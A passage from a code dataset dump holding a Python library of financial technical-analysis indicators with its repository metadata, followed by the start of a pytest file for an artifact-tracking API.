100./(1.+rs)\n RSI = pd.Series(rsi, name = 'RSI_' + str(n))\n return RSI\n\n# Stochastic Relative Strength Index\ndef STOCHRSI(df, n):\n start = -int(n)\n if start < 0:\n start = 0\n rsi = RSI(df, n)\n RSIhistory = rsi[start:]\n minRSI = RSIhistory.min()\n maxRSI = RSIhistory.max()\n base = maxRSI - minRSI\n if base == 0:\n base = -minRSI\n STOCHRSI = pd.Series(((rsi - minRSI) / base), name = 'STOCHRSI_' + str(n))\n return STOCHRSI\n\n#True Strength Index\ndef TSI(df, r, s):\n M = pd.Series(df['close'].diff(1))\n aM = abs(M)\n EMA1 = pd.Series(M.ewm(span = r, min_periods = int(r - 1)).mean())\n aEMA1 = pd.Series(aM.ewm(span = r, min_periods = int(r - 1)).mean())\n EMA2 = pd.Series(EMA1.ewm(span = s, min_periods = int(s - 1)).mean())\n aEMA2 = pd.Series(aEMA1.ewm(span = s, min_periods = int(s - 1)).mean())\n TSI = pd.Series(EMA2 / aEMA2, name = 'TSI_' + str(r) + '_' + str(s))\n return TSI\n\n#Accumulation/Distribution\ndef ACCDIST(df, n):\n ad = (2 * df['close'] - df['high'] - df['low']) / (df['high'] - df['low']) * df['volume']\n M = ad.diff(n - 1)\n N = ad.shift(n - 1)\n ROC = M / N\n AD = pd.Series(ROC, name = 'Acc/Dist_ROC_' + str(n))\n return AD\n\n#Chaikin Oscillator\ndef Chaikin(df):\n ad = (2 * df['close'] - df['high'] - df['low']) / (df['high'] - df['low']) * df['volume']\n Chaikin = pd.Series(ad.ewm(span = 3, min_periods = 2).mean() - ad.ewm(span = 10, min_periods = 9).mean(), name = 'Chaikin')\n return Chaikin\n\n#Money Flow Index and Ratio\ndef MFI(df, n):\n PP = (df['high'] + df['low'] + df['close']) / 3\n i = 0\n PosMF = [0]\n while i < df.index[-1]:\n if PP[i + 1] > PP[i]:\n PosMF.append(PP[i + 1] * df.ix[i + 1, 'volume'])\n else:\n PosMF.append(0)\n i = i + 1\n PosMF = pd.Series(PosMF)\n TotMF = PP * df['volume']\n MFR = pd.Series(PosMF / TotMF)\n MFI = pd.Series(pd.rolling_mean(MFR, n), name = 'MFI_' + str(n))\n return MFI\n\n#On-balance Volume\ndef OBV(df, n):\n i = 0\n OBV = [0]\n while i < df.index[-1]:\n if df.ix[i + 1, 'close'] - df.ix[i, 'close'] > 0:\n OBV.append(df.ix[i + 1, 'volume'])\n if df.ix[i + 1, 'close'] - df.ix[i, 'close'] == 0:\n OBV.append(0)\n if df.ix[i + 1, 'close'] - df.ix[i, 'close'] < 0:\n OBV.append(-df.ix[i + 1, 'volume'])\n i = i + 1\n OBV = pd.Series(OBV)\n OBV_ma = pd.Series(pd.rolling_mean(OBV, n), name = 'OBV_' + str(n))\n return OBV_ma\n\n#Force Index\ndef FORCE(df, n):\n F = pd.Series(df['close'].diff(n) * df['volume'].diff(n), name = 'Force_' + str(n))\n return F\n\n#Ease of Movement\ndef EOM(df, n):\n EoM = (df['high'].diff(1) + df['low'].diff(1)) * (df['high'] - df['low']) / (2 * df['volume'])\n Eom_ma = pd.Series(pd.rolling_mean(EoM, n), name = 'EoM_' + str(n))\n return Eom_ma\n\n#Commodity Channel Index\ndef CCI(df, n):\n PP = (df['high'] + df['low'] + df['close']) / 3\n CCI = pd.Series((PP - pd.rolling_mean(PP, n)) / pd.rolling_std(PP, n), name = 'CCI_' + str(n))\n return CCI\n\n#Coppock Curve\ndef COPP(df, n):\n M = df['close'].diff(int(n * 11 / 10) - 1)\n N = df['close'].shift(int(n * 11 / 10) - 1)\n ROC1 = M / N\n M = df['close'].diff(int(n * 14 / 10) - 1)\n N = df['close'].shift(int(n * 14 / 10) - 1)\n ROC2 = M / N\n Copp = pd.Series((ROC1 + ROC2).ewm(span = n, min_periods = int(n)).mean(), name = 'Copp_' + str(n))\n return Copp\n\n#Keltner Channel\ndef KELCH(df, n):\n KelChM = pd.Series(pd.rolling_mean((df['high'] + df['low'] + df['close']) / 3, n), name = 'KelChM_' + str(n))\n KelChU = pd.Series(pd.rolling_mean((4 * df['high'] - 2 * df['low'] + df['close']) / 3, n), name = 'KelChU_' + str(n))\n KelChD = pd.Series(pd.rolling_mean((-2 * df['high'] + 4 * df['low'] + df['close']) / 3, n), name = 'KelChD_' + str(n))\n return KelChM, KelChU, KelChD\n\n#Ultimate Oscillator\ndef ULTOSC(df):\n i = 0\n TR_l = [0]\n BP_l = [0]\n while i < df.index[-1]:\n TR = max(df.ix[i + 1, 'high'], df.ix[i, 'close']) - min(df.ix[i + 1, 'low'], df.ix[i, 'close'])\n TR_l.append(TR)\n BP = df.ix[i + 1, 'close'] - min(df.ix[i + 1, 'low'], df.ix[i, 'close'])\n BP_l.append(BP)\n i = i + 1\n UltO = pd.Series((4 * pd.rolling_sum(pd.Series(BP_l), 7) / pd.rolling_sum(pd.Series(TR_l), 7)) + (2 * pd.rolling_sum(pd.Series(BP_l), 14) / pd.rolling_sum(pd.Series(TR_l), 14)) + (pd.rolling_sum(pd.Series(BP_l), 28) / pd.rolling_sum(pd.Series(TR_l), 28)), name = 'Ultimate_Osc')\n return UltO\n\n#Donchian Channel\ndef DONCH(df, n):\n i = 0\n DC_l = []\n while i < n - 1:\n DC_l.append(0)\n i = i + 1\n i = 0\n while i + n - 1 < df.index[-1]:\n DC = max(df['high'].ix[i:i + n - 1]) - min(df['low'].ix[i:i + n - 1])\n DC_l.append(DC)\n i = i + 1\n DonCh = pd.Series(DC_l, name = 'Donchian_' + str(n))\n DonCh = DonCh.shift(n - 1)\n return DonCh\n\n#Standard Deviation\ndef STDDEV(df, n):\n return pd.Series(pd.rolling_std(df['close'], n), name = 'STD_' + str(n))\n\n\n\n\nfrom functools import wraps\n\nfrom pandas import DataFrame, Series\nfrom pandas.stats import moments\n\n\ndef series_indicator(col):\n def inner_series_indicator(f):\n @wraps(f)\n def wrapper(s, *args, **kwargs):\n if isinstance(s, DataFrame):\n s = s[col]\n return f(s, *args, **kwargs)\n return wrapper\n return inner_series_indicator\n\n\ndef _wilder_sum(s, n):\n s = s.dropna()\n\n nf = (n - 1) / n\n ws = [np.nan]*(n - 1) + [s[n - 1] + nf*sum(s[:n - 1])]\n\n for v in s[n:]:\n ws.append(v + ws[-1]*nf)\n\n return Series(ws, index=s.index)\n\n\n@series_indicator('high')\ndef hhv(s, n):\n return moments.rolling_max(s, n)\n\n\n@series_indicator('low')\ndef llv(s, n):\n return moments.rolling_min(s, n)\n\n\n@series_indicator('close')\ndef ema(s, n, wilder=False):\n span = n if not wilder else 2*n - 1\n return moments.ewma(s, span=span)\n\n\n@series_indicator('close')\ndef macd(s, nfast=12, nslow=26, nsig=9, percent=True):\n fast, slow = ema(s, nfast), ema(s, nslow)\n\n if percent:\n macd = 100*(fast / slow - 1)\n else:\n macd = fast - slow\n\n sig = ema(macd, nsig)\n hist = macd - sig\n\n return DataFrame(dict(macd=macd, signal=sig, hist=hist,\n fast=fast, slow=slow))\n\n\ndef aroon(s, n=25):\n up = 100 * moments.rolling_apply(s.high, n + 1, lambda x: x.argmax()) / n\n dn = 100 * moments.rolling_apply(s.low, n + 1, lambda x: x.argmin()) / n\n\n return DataFrame(dict(up=up, down=dn))\n\n\n@series_indicator('close')\ndef rsi(s, n=14):\n diff = s.diff()\n which_dn = diff < 0\n\n up, dn = diff, diff*0\n up[which_dn], dn[which_dn] = 0, -up[which_dn]\n\n emaup = ema(up, n, wilder=True)\n emadn = ema(dn, n, wilder=True)\n\n return 100 * emaup/(emaup + emadn)\n\n\ndef stoch(s, nfastk=14, nfullk=3, nfulld=3):\n if not isinstance(s, DataFrame):\n s = DataFrame(dict(high=s, low=s, close=s))\n\n hmax, lmin = hhv(s, nfastk), llv(s, nfastk)\n\n fastk = 100 * (s.close - lmin)/(hmax - lmin)\n fullk = moments.rolling_mean(fastk, nfullk)\n fulld = moments.rolling_mean(fullk, nfulld)\n\n return DataFrame(dict(fastk=fastk, fullk=fullk, fulld=fulld))\n\n\n@series_indicator('close')\ndef dtosc(s, nrsi=13, nfastk=8, nfullk=5, nfulld=3):\n srsi = stoch(rsi(s, nrsi), nfastk, nfullk, nfulld)\n return DataFrame(dict(fast=srsi.fullk, slow=srsi.fulld))\n\n\ndef atr(s, n=14):\n cs = s.close.shift(1)\n tr = s.high.combine(cs, max) - s.low.combine(cs, min)\n\n return ema(tr, n, wilder=True)\n\n\ndef cci(s, n=20, c=0.015):\n if isinstance(s, DataFrame):\n s = s[['high', 'low', 'close']].mean(axis=1)\n\n mavg = moments.rolling_mean(s, n)\n mdev = moments.rolling_apply(s, n, lambda x: np.fabs(x - x.mean()).mean())\n\n return (s - mavg)/(c * mdev)\n\n\ndef cmf(s, n=20):\n clv = (2*s.close - s.high - s.low) / (s.high - s.low)\n vol = s.volume\n\n return moments.rolling_sum(clv*vol, n) / moments.rolling_sum(vol, n)\n\n\ndef force(s, n=2):\n return ema(s.close.diff()*s.volume, n)\n\n\n@series_indicator('close')\ndef kst(s, r1=10, r2=15, r3=20, r4=30, n1=10, n2=10, n3=10, n4=15, nsig=9):\n rocma1 = moments.rolling_mean(s / s.shift(r1) - 1, n1)\n rocma2 = moments.rolling_mean(s / s.shift(r2) - 1, n2)\n rocma3 = moments.rolling_mean(s / s.shift(r3) - 1, n3)\n rocma4 = moments.rolling_mean(s / s.shift(r4) - 1, n4)\n\n kst = 100*(rocma1 + 2*rocma2 + 3*rocma3 + 4*rocma4)\n sig = moments.rolling_mean(kst, nsig)\n\n return DataFrame(dict(kst=kst, signal=sig))\n\n\ndef ichimoku(s, n1=9, n2=26, n3=52):\n conv = (hhv(s, n1) + llv(s, n1)) / 2\n base = (hhv(s, n2) + llv(s, n2)) / 2\n\n spana = (conv + base) / 2\n spanb = (hhv(s, n3) + llv(s, n3)) / 2\n\n return DataFrame(dict(conv=conv, base=base, spana=spana.shift(n2),\n spanb=spanb.shift(n2), lspan=s.close.shift(-n2)))\n\n\ndef ultimate(s, n1=7, n2=14, n3=28):\n cs = s.close.shift(1)\n bp = s.close - s.low.combine(cs, min)\n tr = s.high.combine(cs, max) - s.low.combine(cs, min)\n\n avg1 = moments.rolling_sum(bp, n1) / moments.rolling_sum(tr, n1)\n avg2 = moments.rolling_sum(bp, n2) / moments.rolling_sum(tr, n2)\n avg3 = moments.rolling_sum(bp, n3) / moments.rolling_sum(tr, n3)\n\n return 100*(4*avg1 + 2*avg2 + avg3) / 7\n\n\ndef auto_envelope(s, nema=22, nsmooth=100, ndev=2.7):\n sema = ema(s.close, nema)\n mdiff = s[['high','low']].sub(sema, axis=0).abs().max(axis=1)\n csize = moments.ewmstd(mdiff, nsmooth)*ndev\n\n return DataFrame(dict(ema=sema, lenv=sema - csize, henv=sema + csize))\n\n\n@series_indicator('close')\ndef bbands(s, n=20, ndev=2):\n mavg = moments.rolling_mean(s, n)\n mstd = moments.rolling_std(s, n)\n\n hband = mavg + ndev*mstd\n lband = mavg - ndev*mstd\n\n return DataFrame(dict(ma=mavg, lband=lband, hband=hband))\n\n\ndef safezone(s, position, nmean=10, npen=2.0, nagg=3):\n if isinstance(s, DataFrame):\n s = s.low if position == 'long' else s.high\n\n sgn = -1.0 if position == 'long' else 1.0\n\n # Compute the average upside/downside penetration\n pen = moments.rolling_apply(\n sgn*s.diff(), nmean,\n lambda x: x[x > 0].mean() if (x > 0).any() else 0\n )\n\n stop = s + sgn*npen*pen\n return hhv(stop, nagg) if position == 'long' else llv(stop, nagg)\n\n\ndef sar(s, af=0.02, amax=0.2):\n high, low = s.high, s.low\n\n # Starting values\n sig0, xpt0, af0 = True, high[0], af\n sar = [low[0] - (high - low).std()]\n\n for i in xrange(1, len(s)):\n sig1, xpt1, af1 = sig0, xpt0, af0\n\n lmin = min(low[i - 1], low[i])\n lmax = max(high[i - 1], high[i])\n\n if sig1:\n sig0 = low[i] > sar[-1]\n xpt0 = max(lmax, xpt1)\n else:\n sig0 = high[i] >= sar[-1]\n xpt0 = min(lmin, xpt1)\n\n if sig0 == sig1:\n sari = sar[-1] + (xpt1 - sar[-1])*af1\n af0 = min(amax, af1 + af)\n\n if sig0:\n af0 = af0 if xpt0 > xpt1 else af1\n sari = min(sari, lmin)\n else:\n af0 = af0 if xpt0 < xpt1 else af1\n sari = max(sari, lmax)\n else:\n af0 = af\n sari = xpt0\n\n sar.append(sari)\n\n return Series(sar, index=s.index)\n\n\ndef adx(s, n=14):\n cs = s.close.shift(1)\n tr = s.high.combine(cs, max) - s.low.combine(cs, min)\n trs = _wilder_sum(tr, n)\n\n up = s.high - s.high.shift(1)\n dn = s.low.shift(1) - s.low\n\n pos = ((up > dn) & (up > 0)) * up\n neg = ((dn > up) & (dn > 0)) * dn\n\n dip = 100 * _wilder_sum(pos, n) / trs\n din = 100 * _wilder_sum(neg, n) / trs\n\n dx = 100 * np.abs((dip - din)/(dip + din))\n adx = ema(dx, n, wilder=True)\n\n return DataFrame(dict(adx=adx, dip=dip, din=din))\n\n\ndef chandelier(s, position, n=22, npen=3):\n if position == 'long':\n return hhv(s, n) - npen*atr(s, n)\n else:\n return llv(s, n) + npen*atr(s, n)\n\n\ndef vortex(s, n=14):\n ss = s.shift(1)\n\n tr = s.high.combine(ss.close, max) - s.low.combine(ss.close, min)\n trn = moments.rolling_sum(tr, n)\n\n vmp = np.abs(s.high - ss.low)\n vmm = np.abs(s.low - ss.high)\n\n vip = moments.rolling_sum(vmp, n) / trn\n vin = moments.rolling_sum(vmm, n) / trn\n\n return DataFrame(dict(vin=vin, vip=vip))\n\n\n@series_indicator('close')\ndef gmma(s, nshort=[3, 5, 8, 10, 12, 15],\n nlong=[30, 35, 40, 45, 50, 60]):\n short = {str(n): ema(s, n) for n in nshort}\n long = {str(n): ema(s, n) for n in nlong}\n\n return DataFrame(short), DataFrame(long)\n\n\ndef zigzag(s, pct=5):\n ut = 1 + pct / 100\n dt = 1 - pct / 100\n\n ld = s.index[0]\n lp = s.close[ld]\n tr = None\n\n zzd, zzp = [ld], [lp]\n\n for ix, ch, cl in zip(s.index, s.high, s.low):\n # No initial trend\n if tr is None:\n if ch / lp > ut:\n tr = 1\n elif cl / lp < dt:\n tr = -1\n # Trend is up\n elif tr == 1:\n # New high\n if ch > lp:\n ld, lp = ix, ch\n # Reversal\n elif cl / lp < dt:\n zzd.append(ld)\n zzp.append(lp)\n\n tr, ld, lp = -1, ix, cl\n # Trend is down\n else:\n # New low\n if cl < lp:\n ld, lp = ix, cl\n # Reversal\n elif ch / lp > ut:\n zzd.append(ld)\n zzp.append(lp)\n\n tr, ld, lp = 1, ix, ch\n\n # Extrapolate the current trend\n if zzd[-1] != s.index[-1]:\n zzd.append(s.index[-1])\n\n if tr is None:\n zzp.append(s.close[zzd[-1]])\n elif tr == 1:\n zzp.append(s.high[zzd[-1]])\n else:\n zzp.append(s.low[zzd[-1]])\n\n return Series(zzp, index=zzd)\n\n", "repo_name": "mainyaa/bitmech", "sub_path": "bitmech/indicators.py", "file_name": "indicators.py", "file_ext": "py", "file_size_in_byte": 22912, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 11, "dataset": "github-code", "pt": "53", "api": [{"api_name": "pandas.Series", "line_number": 11, "usage_type": "call"}, {"api_name": "pandas.rolling_mean", "line_number": 11, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 16, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 21, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 28, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 39, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 40, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 45, "usage_type": "call"}, {"api_name": "pandas.rolling_mean", "line_number": 45, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 46, "usage_type": "call"}, {"api_name": "pandas.rolling_std", "line_number": 46, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 48, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 50, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 55, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 56, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 57, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 58, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 59, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 60, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 61, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 63, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 68, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 73, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 74, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 88, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 114, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 115, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 116, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 117, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 118, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 119, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 120, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 125, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 126, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 127, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 132, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 133, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 134, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 135, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 136, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 141, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 142, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 143, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 144, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 145, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 154, "usage_type": "call"}, {"api_name": "pandas.rolling_sum", "line_number": 154, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 171, "usage_type": "call"}, {"api_name": "pandas.rolling_sum", "line_number": 171, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 192, "usage_type": "call"}, {"api_name": "pandas.rolling_sum", "line_number": 192, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 203, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 204, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 205, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 206, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 207, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 227, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 228, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 229, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 230, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 231, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 242, "usage_type": "call"}, {"api_name": "numpy.float64", "line_number": 242, "usage_type": "attribute"}, {"api_name": "pandas.Series", "line_number": 260, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 275, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 280, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 282, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 283, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 284, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 285, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 286, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 295, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 301, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 315, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 317, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 318, "usage_type": "call"}, {"api_name": "pandas.rolling_mean", "line_number": 318, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 333, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 334, "usage_type": "call"}, {"api_name": "pandas.rolling_mean", "line_number": 334, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 339, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 345, "usage_type": "call"}, {"api_name": "pandas.rolling_mean", "line_number": 345, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 351, "usage_type": "call"}, {"api_name": "pandas.rolling_mean", "line_number": 351, "usage_type": "call"}, {"api_name": "pandas.rolling_std", "line_number": 351, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 362, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 367, "usage_type": "call"}, {"api_name": "pandas.rolling_mean", "line_number": 367, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 368, "usage_type": "call"}, {"api_name": "pandas.rolling_mean", "line_number": 368, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 369, "usage_type": "call"}, {"api_name": "pandas.rolling_mean", "line_number": 369, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 383, "usage_type": "call"}, {"api_name": "pandas.rolling_sum", "line_number": 383, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 398, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 404, "usage_type": "call"}, {"api_name": "pandas.rolling_std", "line_number": 404, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 419, "usage_type": "argument"}, {"api_name": "functools.wraps", "line_number": 417, "usage_type": "call"}, {"api_name": "numpy.nan", "line_number": 430, "usage_type": "attribute"}, {"api_name": "pandas.Series", "line_number": 435, "usage_type": "call"}, {"api_name": "pandas.stats.moments.rolling_max", "line_number": 440, "usage_type": "call"}, {"api_name": "pandas.stats.moments", "line_number": 440, "usage_type": "name"}, {"api_name": "pandas.stats.moments.rolling_min", "line_number": 445, "usage_type": "call"}, {"api_name": "pandas.stats.moments", "line_number": 445, "usage_type": "name"}, {"api_name": "pandas.stats.moments.ewma", "line_number": 451, "usage_type": "call"}, {"api_name": "pandas.stats.moments", "line_number": 451, "usage_type": "name"}, {"api_name": "pandas.DataFrame", "line_number": 466, "usage_type": "call"}, {"api_name": "pandas.stats.moments.rolling_apply", "line_number": 471, "usage_type": "call"}, {"api_name": "pandas.stats.moments", "line_number": 471, "usage_type": "name"}, {"api_name": "pandas.stats.moments.rolling_apply", "line_number": 472, "usage_type": "call"}, {"api_name": "pandas.stats.moments", "line_number": 472, "usage_type": "name"}, {"api_name": "pandas.DataFrame", "line_number": 474, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 492, "usage_type": "argument"}, {"api_name": "pandas.DataFrame", "line_number": 493, "usage_type": "call"}, {"api_name": "pandas.stats.moments.rolling_mean", "line_number": 498, "usage_type": "call"}, {"api_name": "pandas.stats.moments", "line_number": 498, "usage_type": "name"}, {"api_name": "pandas.stats.moments.rolling_mean", "line_number": 499, "usage_type": "call"}, {"api_name": "pandas.stats.moments", "line_number": 499, "usage_type": "name"}, {"api_name": "pandas.DataFrame", "line_number": 501, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 507, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 518, "usage_type": "argument"}, {"api_name": "pandas.stats.moments.rolling_mean", "line_number": 521, "usage_type": "call"}, {"api_name": "pandas.stats.moments", "line_number": 521, "usage_type": "name"}, {"api_name": "pandas.stats.moments.rolling_apply", "line_number": 522, "usage_type": "call"}, {"api_name": "pandas.stats.moments", "line_number": 522, "usage_type": "name"}, {"api_name": "numpy.fabs", "line_number": 522, "usage_type": "call"}, {"api_name": "pandas.stats.moments.rolling_sum", "line_number": 531, "usage_type": "call"}, {"api_name": "pandas.stats.moments", "line_number": 531, "usage_type": "name"}, {"api_name": "pandas.stats.moments.rolling_mean", "line_number": 540, "usage_type": "call"}, {"api_name": "pandas.stats.moments", "line_number": 540, "usage_type": "name"}, {"api_name": "pandas.stats.moments.rolling_mean", "line_number": 541, "usage_type": "call"}, {"api_name": "pandas.stats.moments", "line_number": 541, "usage_type": "name"}, {"api_name": "pandas.stats.moments.rolling_mean", "line_number": 542, "usage_type": "call"}, {"api_name": "pandas.stats.moments", "line_number": 542, "usage_type": "name"}, {"api_name": "pandas.stats.moments.rolling_mean", "line_number": 543, "usage_type": "call"}, {"api_name": "pandas.stats.moments", "line_number": 543, "usage_type": "name"}, {"api_name": "pandas.stats.moments.rolling_mean", "line_number": 546, "usage_type": "call"}, {"api_name": "pandas.stats.moments", "line_number": 546, "usage_type": "name"}, {"api_name": "pandas.DataFrame", "line_number": 548, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 558, "usage_type": "call"}, {"api_name": "pandas.stats.moments.rolling_sum", "line_number": 567, "usage_type": "call"}, {"api_name": "pandas.stats.moments", "line_number": 567, "usage_type": "name"}, {"api_name": "pandas.stats.moments.rolling_sum", "line_number": 568, "usage_type": "call"}, {"api_name": "pandas.stats.moments", "line_number": 568, "usage_type": "name"}, {"api_name": "pandas.stats.moments.rolling_sum", "line_number": 569, "usage_type": "call"}, {"api_name": "pandas.stats.moments", "line_number": 569, "usage_type": "name"}, {"api_name": "pandas.stats.moments.ewmstd", "line_number": 577, "usage_type": "call"}, {"api_name": "pandas.stats.moments", "line_number": 577, "usage_type": "name"}, {"api_name": "pandas.DataFrame", "line_number": 579, "usage_type": "call"}, {"api_name": "pandas.stats.moments.rolling_mean", "line_number": 584, "usage_type": "call"}, {"api_name": "pandas.stats.moments", "line_number": 584, "usage_type": "name"}, {"api_name": "pandas.stats.moments.rolling_std", "line_number": 585, "usage_type": "call"}, {"api_name": "pandas.stats.moments", "line_number": 585, "usage_type": "name"}, {"api_name": "pandas.DataFrame", "line_number": 590, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 594, "usage_type": "argument"}, {"api_name": "pandas.stats.moments.rolling_apply", "line_number": 600, "usage_type": "call"}, {"api_name": "pandas.stats.moments", "line_number": 600, "usage_type": "name"}, {"api_name": "pandas.Series", "line_number": 645, "usage_type": "call"}, {"api_name": "numpy.abs", "line_number": 662, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 665, "usage_type": "call"}, {"api_name": "pandas.stats.moments.rolling_sum", "line_number": 679, "usage_type": "call"}, {"api_name": "pandas.stats.moments", "line_number": 679, "usage_type": "name"}, {"api_name": "numpy.abs", "line_number": 681, "usage_type": "call"}, {"api_name": "numpy.abs", "line_number": 682, "usage_type": "call"}, {"api_name": "pandas.stats.moments.rolling_sum", "line_number": 684, "usage_type": "call"}, {"api_name": "pandas.stats.moments", "line_number": 684, "usage_type": "name"}, {"api_name": "pandas.stats.moments.rolling_sum", "line_number": 685, "usage_type": "call"}, {"api_name": "pandas.stats.moments", "line_number": 685, "usage_type": "name"}, {"api_name": "pandas.DataFrame", "line_number": 687, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 696, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 750, "usage_type": "call"}]} +{"seq_id": "22389621896", "text": "import datetime\n\nimport pytest\n\nfrom piperci_gman.artman import ArtMan\nfrom piperci_gman.orm.models import Artifact, Task, TaskEvent, db\n\n_artifacts = [\n {'uri': 'https://someminio.example.com/art1',\n 'sri': 'sha256-sCDaaxdshXhK4sA/v4dMHiMWhtGyQwA1fP8PgrN0O5g=',\n 'sri-urlsafe':\n 'c2hhMjU2LXNDRGFheGRzaFhoSzRzQS92NGRNSGlNV2h0R3lRd0ExZlA4UGdyTjBPNWc9',\n 'type': 'artifact',\n 'caller': 'pytest'},\n {'uri': 'https://someminio.example.com/art2',\n 'sri': 'sha256-jrT+J2yEC8wfUr6N/YxxbR/ux5y2GriIqXsySl5uVK8=',\n 'sri-urlsafe':\n 'c2hhMjU2LWpyVCtKMnlFQzh3ZlVyNk4vWXh4YlIvdXg1eTJHcmlJcVhzeVNsNXVWSzg9',\n 'type': 'source',\n 'caller': 'pytest'},\n {'uri': 'https://someminio.example.com/art1',\n 'sri': 'sha256-sCDaaxdshXhK4sA/v4dMHiMWhtGyQwA1fP8PgrN0O5g=',\n 'sri-urlsafe':\n 'c2hhMjU2LXNDRGFheGRzaFhoSzRzQS92NGRNSGlNV2h0R3lRd0ExZlA4UGdyTjBPNWc9',\n 'type': 'artifact',\n 'caller': 'pytest',\n 'task_id': 'New'},\n ]\n\n\ndef formateach(data, values):\n i = 0\n for k, v in data.items():\n try:\n data[k] = v.format(values[i])\n i += 1\n except IndexError:\n raise ValueError('Ran out of values to fill dict')\n\n\n@pytest.fixture\ndef artifact(api, client, testtask):\n task = testtask()\n data = {'task_id': task.json['task']['task_id']}\n data.update(_artifacts[0])\n resp = client.post(api.url_for(ArtMan), json=data)\n return resp.json, data\n\n\n@pytest.fixture\ndef artifacts(api, client, testtask):\n task = testtask()\n arts = []\n\n for artifact in _artifacts:\n if 'task_id' in artifact and artifact['task_id'] == 'New':\n _task = testtask()\n else:\n _task = task\n\n data = {}\n data.update(artifact)\n data['task_id'] = _task.json['task']['task_id']\n\n resp = client.post(api.url_for(ArtMan), json=data)\n # assert resp.status_code == 200\n if resp.status_code != 200:\n pytest.fail(str(resp.json) + str(data))\n arts.append((resp,\n data))\n\n return arts\n\n\ndef test_get_artifact(api, client, artifacts):\n\n for artifact in artifacts:\n art_id = artifact[0].json['artifact_id']\n resp = client.get(f'/artifact/{art_id}')\n assert resp.status_code == 200\n\n\ndef 